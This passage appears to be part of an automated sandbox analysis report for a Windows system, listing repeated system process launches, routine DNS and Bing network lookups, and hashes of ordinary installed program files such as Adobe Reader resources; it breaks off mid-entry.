"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp

Files

C:\Program Files\7-Zip\7zFM.exe

MD5 45d3d62890fa98b808e4379a0a399baf
SHA1 5b5459717f961d20f002e3c5d3268906a71e7f73
SHA256 de96183d3d1e3c5a790c8fb31df0c6879d3bf1ca64b10be23452b58ee8e2b69e
SHA512 748cdde074183fe2780a236a9cf3e8141c5a79f492cad5656e44f706a74a58575015181d32d39bc177a4b68a045f7f0b836ba9d66e73fefe9877efb5744d6f2f

C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es\readme.txt

MD5 dbac9649c4bd702f55fbd1afafe87c44
SHA1 0d914f4a809cfe400ca111ebfbd0ad552d500785
SHA256 b9dfa3b30224bd5eef298531c945d5f2f6bb978b7ef42e5ef09715a535172127
SHA512 86d7786b400303b1fb722689aba7e8ef6a01ad7e2776194c5d545a7d7357dd91e7079296790587210683db7f4385f98f281272fd3d1ad6770dabf401709a6415

C:\Program Files\Java\jre-1.8\legal\jdk\pkcs11wrapper.md

MD5 950ac8e007b49ed7acf1646758393817
SHA1 3a795f27aac36ba92f33165a6550cc7f201b3254
SHA256 4ab0585ac1cc953813901847e774a0a6e2542bedd0e5964cacf31e421455223e
SHA512 6bf7c6bdc1f802cdc8cea1d5a22de2e2cdf307411504499351fa5e9bdb7d1826c1968c4cc8bbb2fc17ea69850d69e0e2d77b76d29ad991813b598fc18ea0982e

C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt

MD5 f0be99f92d8b8ad3d79c9aa580fc2f08
SHA1 a9ab5160208575c2c19277491406d5c95690a5f0
SHA256 e290cb91a6aaf54bb397c8f72d0bf5e8a70935ca00abde862e3d13fdf75fdbb0
SHA512 c9c2002d0f14f1d92924f80105c4b092bcb8de5bcb838179f2129b125fbcdf83f78ee80f44b0e26bab451c6fa5d6a29547a4933a92858e310dfbbdcee32f8cae

C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Slipstream.xml

MD5 c181d62d13f055127f354bb60cdfa03b
SHA1 6cbfcbcdb417807d7ce1ffeeaa2eaaf9b548885a
SHA256 d8dc1b9aa2aefd658fae2d9b6bf36318bdda72fcecba0538a1f121592b44e3b6
SHA512 62dd4c375f5e3299843c78dc86026da551a8a66c2c4cfac4003b8e4774ddd1cc36c130611c15182b61a472169305b75c845f17ec899e53250461867cc82abd36

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_2x.png

MD5 7d00bc0d46dcb90890a4fe6b76bc5c3a
SHA1 7159b1e1c264a6863708a971eaeca32cff864aa1
SHA256 2fcd2848cbcab1a3b8154138288cc659cd2c187412cb887eec6554b6165b8c33
SHA512 2f113cb27028aa0fa0f028b09ddcddb4a1ede6ae0823909d99763db6e5be57b1b4ae6977537ec17808cd622bc548e1ba3122e35b58de9d856400d33042234a35

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png

MD5 1dc5d31ef9205f1034b64d635d59cb32
SHA1 c172576576c5ac5a3c2912bdfd0c8365b5365513
SHA256 676d1f912a22a12ad4c80bf552355a7e0995c56e6ef7527aaa9b77e513efc065
SHA512 bc334638acb1416787df04cbaebde99cd15d96c5b96b6f950cbdfb54177fcd2f2ecce4dc9212a9a3f2f85269ac901aef147ec6297c31c5ee6cc39ee4cdac17c1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\ui-strings.js

MD5 6e8d259daabf1168ae5136a3de48ee80
SHA1 b015257e3ae0810ddbda53c0b12991161a863ffb
SHA256 13370a65ca7e31fbf3a133156c208bf99c01a54880d55a8a4500495683e3a47f
SHA512 cf3c564c18c6b0965a431cda1ed8fa97cbeeb839d992e48f77c073bc8054ead03b4823df381c5179d3d398877da3473b92d70ae905a2bd0c7e5fc45505340113

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\ui-strings.js

MD5 88151ac4ebd7f5ff2d381c65e68cece7
SHA1 f979db4063d15ef2e32db3c38890899bb87c78e5
SHA256 c1ea4ada9462abd4ec352dfaf670575e9caff1e55d303db96a2f2500d50d92e8
SHA512 326195f5176beed6cc39849b8d6e87a5136c41a04aa76f53c30bbed1ff74391e16a6114e236f39d403c7f82fda032c00a9ee1df583412dfea224047e51f4c3bb

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\ui-strings.js

MD5 60f1a26612dc049ce3e00fe917b6475d
SHA1 05791d089cbcd759088adbbd9483433dc9a10206
SHA256 8ced84488e1ea81e8cc3ec1a25f5b849de902601bef557b6ec65f9de2982bece
SHA512 06f080a9df9081a2bfd557165f9c21cf2bce3ee161c0896a9f9a6e0f8a3ae545b1cfaaca9ce1d46757dbe0163ddd0421bdb51558ef092dd0a6e5c2052ead4706

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png

MD5 ea321d33cfeb1d029794bd01c5b78e85
SHA1 4e04b2d8f7f23f44f96f4bbf134233e1feb5e28b
SHA256 3add439f478220ce8001abf2543810144a0d80f8116bc0ca13947c9745983c55
SHA512 f574d12330a668d89402265cf5a859a76325ed548e1730e02f51dfd36e3d5dccf2c8b75a76a8c931597bfc130a42364c73eef0200523d4eefbcf4fa5ccacddea

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png

MD5 a660ce180dea34b4944d83569f4789bc
SHA1 e3ca7b90c8bd299c49585bd29bc3fb7494c0fa4e
SHA256 03ab6f2f396e0531f1b1299b61485408cff93f183942910a7d0d5f0c7a666bd8
SHA512 9de185c0e6a8cc49852ebb454a00a7a19f5382b358327d393a6952b32099036147c1eb799cc60078bf24477e9607a1b4c88288a213a8ffcafd8d60caab0f0720

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\ui-strings.js

MD5 cdc58b2bf0a1a34f96af8fdcb62dc30b
SHA1 69eb0d674e9830e81cecdd610792225a2a5dc265
SHA256 3b5888b652cd86408bdd59e86405d3f171d23132059228544fbe693cfcb2b73c
SHA512 d8ef3220b8984f759347a0e83eb75939c914bf865db492d28e226f113b469a97325befa008886743aeae2e0f32c74c0a1e7ce8b60eaf5949b51058a618daa502

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png

MD5 55c2b47c9aea50661a855fe91eb8ac32
SHA1 13ea23a51394ea2c13420ddac1294eae6f82f846
SHA256 ba5a59d879c1f6543b46085d02f5c90fdb22e663487d3586b6533cd887c83b72
SHA512 947da2e85f5c21e7847f10d727729915973c911a47de233ef1fb97f60ae41db05f4c8c0ee655e3aa264db2067763e4134b76279f1d3ea8ad43640a64176522a3

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png

MD5 808e7aedbb1da793b86c92816309035e
SHA1 b4a2fca53290a35ae222f2cdf80f68ec7eab51e6
SHA256 a90f0edb8324760029a5db9f641b05694f8717c25514b2d6abde7662c827e0cb
SHA512 0af4e6a83661378b618c40de02c6cb7244be544dcb02f1f14c83b6abd791fa0330b6d508c86f0ba8e345608639d8505a2f26d3a6d3ae201bb01319c10c212d4a

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\ui-strings.js

MD5 5c1dc195043bdea8525930a9882c10d7
SHA1 17415e551255ab016f7682d7b33451cfcb91e687
SHA256 019bad9e72430b758828953e3310007695c55fed1d25fdd707c76fec561f2bc5
SHA512 e912b84e9b4856864d302154b68adf6822189aa78859265cf8f529279e77a9d7c086452b4527ebb75d9c910ad9a6a1e95e1f45498fc168628da80739acff742e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected]

MD5 8db5f9dff9d857a8827ea6d66fea4880
SHA1 ef5de087109543e49ee7fe70adb49efe27e15121
SHA256 e8c6ae3d3f05d53d58200db3f31383861d434c6abbf66f82e925321029058a10
SHA512 70723910b4bf8814f848e10390378d53d9fb67e8a319edb708edc41b5c858c1d2cfc0b86a2909e33f72062df8b32e70554fa5ebe7aad7ec474ad78087560069b

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\ui-strings.js

MD5 4e6de5201d795432e75c0628dd306b26
SHA1 80ae62145f6bc55c2a25f68ad9d6bc9fcae496db
SHA256 1265f683d27701f95b545e6201577fb4eadf5dcfbc1fc8cedb8dd39635515788
SHA512 950227253fb845bd9a4519a209d72404760492473bda8101d846ded18aef1a2f6f6ab99b1b1b2186c0eed423c151c089316e124384f214644632e6a0f4dbece3

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main-selector.css

MD5 89728f1ec13231dd11d2ea20afe39d67
SHA1 b4350cd128350483be389b2c865633bd1ae0f78b
SHA256 aff85e66d5b690dc0188f4c2348ca78abdc14605286128407242a4e91a684754
SHA512 58203e9c3898367c78c6d10fa629c0bd2356b2ae54e225afbcee83be1d5d297977a5a9633e773ffc2b8079a6e2eb2aa0afc530c27d29f512af40d8c9ae539adb

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png

MD5 a93c09c1a326a8733b4eceb713ca7457
SHA1 90ba7a4c24bb0d424abda46b736170ea3b43e541
SHA256 d03f54aaa9216f4e32053928ce87a317341232f107140c84f73b2b6490b5a81a
SHA512 432c3400257d00391baa255d32fd03e0b8c97231d684ef35534868a38bcbf9cb70b433eacfe154c25fd3376e69592a7000a823535700f353975572c5101a56af

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\ui-strings.js

MD5 fc4cdc00064f47d2eedf58bd02068fe1
SHA1 cbb7157d8c560e9b2cdffac3a2b831202d76d2e6
SHA256 0e8fb0e6e1dd239a2a1996059914a5ec5e753782527c1a07c62d808eb77df3e0
SHA512 753d312596fdd24d3ad87b7916c5d108d185b42beff7c750099aecb38c7a321ff04260c19492d18cc27cf8f8843c6b3facde0934e67a46e9ce4291c3646abbe8

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ui-strings.js

MD5 c5596fa17e59cbf92a2ea2e1ad5c6f8b
SHA1 4153a71b5750685afba568403ed7522e83a9894f
SHA256 5812ebbc6311c0ff9919a27137b22435cbca3cb9fd56959b44ddb82f93609b99
SHA512 762580962300f0e0501054450772ed59cdfec76d7aa6b1944f557ccd74ec2fcd171ffd67765f2b367c526d0193eabd184f0d4ac1dadb7a0d25f00f9866f670bc

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\ui-strings.js

MD5 26645133c9de7799e35cee0e47b82ee0
SHA1 bb6be735f6814d765bbe6b3f3ce034d1767366c5
SHA256 1180e5728ff28a49eec43c61f15d49541419e79397ae58479db67b533d292d36
SHA512 c466dc886b25fea5a0e16aec28a4e784afe797f3937c7863788d0e5fa41414346bb17546d49178a48815debcca50aec3acabadc1f508fe0a3207008bc722608e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png

MD5 cc62ce00dfbe76fd8affad9c89fced8c
SHA1 75d64cc57ff45a50c066f882bfd8e3845f8fa323
SHA256 e324ff224bfa2baf51d4ab75f686195a76b8c984676c450ed660eb9ca2b36f4e
SHA512 028056e42f0eb02646752b351bb04a6b9f87ff27a2e1060b4fe4d4867118fe90f42f555ea8c645361963405583005ec4f3802c7c57729fc8616df1af09cc94dd

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-gb\ui-strings.js

MD5 fa904cdf440c6743078637992d58489f
SHA1 6969f407be2a1b52c5a41be256433026cabf9917
SHA256 152f6d0325802be61521bff49a8dd07063feaffeb2447d3ae6f47adf214cbffb
SHA512 c6237e56225d36d26ed594406a5bc08987bc34fac8d425dac8f909512ff19e6a27e1566651c591a38c0a5476e74dca09beb53ec15d4f08b6de2843fa064cbd3f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ui-strings.js

MD5 573dd292166f86741bb965ee068c3793
SHA1 169fcf0880c7a2c5993f5bf28ff64cd9ed441dd9
SHA256 ab2b7de642b66db6e6b610dab8fb3c94c972465e07b7f681127c40a6629d8c2e
SHA512 0217d582d827a7b6faa950bc726d41c4c7644ba11b19689b9e5eb60cf54df4afaefcf4eac3649e8315dc1134988dc71abcb94bd9a640829bf9d68a6ffa17241b

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\ui-strings.js

MD5 7adbce4bec815b574ab3fc6d85eb1937
SHA1 7d14e52fc6aa5796996988e9feab97c31eab1e0b
SHA256 efec14a7f219aff9e96c136933c0316abbabfa082b5755a86b2745c0a8423a79
SHA512 4218fc7991ef7ab93b1fab696432fc0130f07c534b2da244ce3370e6092213db657505af8380e7a07576b16b19d7c1b58f6a5498122d73061a362162b31f5b18

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\ui-strings.js

MD5 bf70043c03230a91bb5b402e7ee67e63
SHA1 2ec8302c3ebe1e34abb5e0c813abceaadfc5073c
SHA256 a8b45a4c0a3adae007e8ef6b3a0e9966d2ad0c552320210a778109e2799f6c75
SHA512 ecdf54cc56de9c49dec1e9e65aefa736201904e609474b13d089f188bf35ae46b62d1ba492f4c25ad3fd7ff584a1532be18c0115598c2deaa834b22e6e52a601

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\ui-strings.js

MD5 478f0065e127108d705114b29fb9170a
SHA1 3d954983b0594275bdbe444336baad9517129b79
SHA256 1beae6b25a652882189f27e3b52232bc3451a54eeedf3e5cb0eb827fe15032f9
SHA512 4affd4e7c23c555d99a5a1a4ff929228af723961c6cc1c320358998fbba2528e2d84d5c64a5c28fd6420ba3132fad056f2388538086d061510d80e244f7b3990

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\ui-strings.js

MD5 661fea8b99a08e2422d8b5b9bcfd9921
SHA1 54a78f38a3599aed6d27c6fc711d7af7a205c524
SHA256 60624904ad10defbfcafa3acd5dac4c7c5040edde23bff489b6b32ea5a1403ad
SHA512 69b58c6c99f494ca1b6f2788cd17b63cc9f583b0abca870f666aedb9c504f660b03df699b69828c8ecc43a747297042eeca7e197de96dd43defb7871e2289b9c

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\ui-strings.js

MD5 3dd77972f6558af4969a57eb4f19f2d0
SHA1 d56f6ebeaf408c667bb9491845a33ddc19d18947
SHA256 cde2dda4b1709d6591356e21717833ecf9802dc119d719e9dbbc97b090158644
SHA512 68f15867e6b29cce5415ce31203cc3f1790869f85d1b1ba8b2912e9b1b570f61485e5e9aac96d9bcc069e81d298b56d8941cd94a1df72d07c7508c7fdcc7ef1b

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hr-hr\ui-strings.js

MD5 95e6ecbe44dc4ab34323c697c6568b56
SHA1 0ca5debc2a7b53245ae6b7d6594ba93b3152bdee
SHA256 d3bdbdce059d04ec6e336179e6262bc694def0fcc5fe4b006953dbf178dbb30c
SHA512 af6262bf0a2b16fbd1dff7051eb0373336781c105b63631080ed2b6d38f54adbdbd16d794917fb9ad08c9ee238e0d4df732b7ef3e4c6d521a6b347eb8c2e9804

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\ui-strings.js

MD5 4fcc8af63d8fea1581c1e96e9436e913
SHA1 5c09be5c84dba1172a2503a3406223baed06f8bc
SHA256 bbce03b612d22d42e40207a0ac4b6492ab0ad8c2cf4690377929f4cad738954d
SHA512 4bb1df7206f7fee79df361d678cd250399efff9d13d3435448170efd515abb425fcbf3b6ad9d0c6da1b4a7860d33dfd15daaa199e96dcdd701afb3b80234f2d6

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ko-kr\ui-strings.js

MD5 21a5d65fbcf76ed1b8e9489d3bb051f7
SHA1 dcfde89bb81642e0b1bcb2b4d8c0fe574e912950
SHA256 f054ff5e3f41e79c647bd03dc9ad1bad42f8292c7e7b839088faeb8abc182ff4
SHA512 566bc1f2c5f4b2b9888c8e414552c25609d2562e10a8abddf6f036a6cbe2bc7644cbe850311224c25db96380c0e11fb07800f965305f41e068968bee530c320a

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\ui-strings.js

MD5 0e038344281f0aa0a74103dd77048888
SHA1 163a5a2d3888eb23ecc17b53865742f3eb7aa3c1
SHA256 f3a76de64a79cd7afa5438bb0a4f4330a97497246fe00f7b29fb690e2ffe32cd
SHA512 5988b04142669c005728510cc0a0c7507a9b8561b9d3178e3ef06b77a725e5e3ab7c13faf2998522c601285e823d3f72edbe7b93ba6b14a9c5afefbacb974560

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sv-se\ui-strings.js

MD5 c4b091c93a4910ecfc619efdf3c56111
SHA1 4147f571dfd1d77b6a6943c57784820bd0cba24c
SHA256 d30e4139d68728b1c0b7c0fdccf649fc98c269f0d57c08e1d2033c13f162c29a
SHA512 b276ec16ba3a0737c8958a7373c3b5b53d384432535e65ee5651dce90da0eaf7dad1a02479243efb0b5ea78234c0f423ebc10c82b6e28db557106b8a21db1964

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\dd_arrow_small.png

MD5 65afdbfd57a964a5525ef68ca68cb5f4
SHA1 986fd9886e54eaa35b90561c94b00f85eb758711
SHA256 322fa7539ee1552758dbb051fe1199a7b4b247ec8335fb35cabf043d8947466d
SHA512 88b2d9c205d6fa4fb7823fa118fb95c651977cbaf1b54445ced380d34541e5367a218de4335a341b3994839386b487fcc33718b749ab2e05678ae87e0da1dbd7

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\share_icons.png

MD5 2870d12e27e8a50bf66493145c06939a
SHA1 f4319fc28ae1f99e359b5cfbd4c8c69af67dc03e
SHA256 dd6fda1bd17d115065254a8af134a7906d8e15e2725b01223582c3add3240272
SHA512 39b2281464998cd9f3d87659cdf7f3f2690a82bb8093ac64d5141d837dd4f951514cf0fcbfc02a0102f3d8ce780805886a361c649d6df2347db60b383442e5d0

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adc_logo.png

MD5 d1dfee6d7b14e63f64c349b2cae8ad27
SHA1 fd382215ff99c0993d8924f18ff7912b4835f4ad
SHA256 b63bba00ed3b7a86b6ed36ab7d6eede57656454e0a583b875d34ee19466714e4
SHA512 220e189bc67b20bef3f92da6dd063b12fd53436c6fa9e728553669e4d42dbe595c52801e68a929797c48dc56fa4ff47919aa3d065363ce881e207abc83f7de77

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png

MD5 598b166da1d843121d50f9593073a15e
SHA1 e41c87d8fa9aa263dfe783bdd692556fb8e24f43
SHA256 c46d21ff4c32097f172b4e99b5794374ed4a1cb025040d157f611f43929e98d5
SHA512 107ceb56129c1baade5930cea77fdc9c53264ff06b92936a5823c483235ffce8ab4ca3efef5001c5cc16eb3351b663877e1e4184749ba33d785b4927fe2f2db1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png

MD5 48a2c150eaa7d9fe84e7e31163e67495
SHA1 cfd5375b61328af47b784d2e1229c95c9355ce06
SHA256 ff1d90818c6ec24ad8dc4334bed7e72b3ceb9460cdfe3b25ec24d2b31b4c9288
SHA512 e6abeeb5ed043270c9148b58fa359d8536e0a9606aaed86446f3cc3ef14a855b711a86869d02fe27f50ef79b91895c77bc970c6ccf962caeb8311984c4778410

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png

MD5 34300ee4cd847a5329747c2294699c1f
SHA1 5e1086c8ebeaf9205517c82d8ae1711931ec48e1
SHA256 122650bd6eea6dc3c3cde5c472c78fe200967b33c6e3f3d2f394d8fb66c3acfe
SHA512 ecea239cb49cc1b9018e9d5bc34fa0d501cd9dc6bd7a8c01b8a2bfe9cb8d9baf805081d3705f0f986903a93a35a3ddcb852463bc2698606b556999cd0608ad6e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png

MD5 d82b1439dcd0ea62ce3edcf6d36eac1e
SHA1 f5216b9a0c6b294584b24a5fd50b43e79d46310e
SHA256 44f25bfcbff16b8e7c81ac93d6dcbc312035c81ba6d62e61d4177e23ef62dbff
